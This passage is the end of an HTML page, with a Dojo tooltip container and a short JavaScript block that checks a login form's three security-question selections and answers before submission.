</div><div class="dijitTooltip dijitTooltipLeft" id="dijit__MasterTooltip_0" widgetid="dijit__MasterTooltip_0">
	<div class="dijitTooltipContainer dijitTooltipContents" dojoattachpoint="containerNode" wairole="alert" role="alert"></div>
	<div class="dijitTooltipConnector"></div>
</div>

      <script language="JavaScript" type="text/javascript">
  var frmvalidator  = new Validator("loginForm");
  
frmvalidator.addValidation("question1","dontselect=0","Please select your Question 1.");
frmvalidator.addValidation("answer1","req","Please enter your Answer 1.");

frmvalidator.addValidation("question2","dontselect=0","Please select your Question 2.");
frmvalidator.addValidation("answer2","req","Please enter your Answer 2.");

frmvalidator.addValidation("question3","dontselect=0","Please select your Question 3.");
frmvalidator.addValidation("answer3","req","Please enter your Answer 3.")

</script>

</body></html>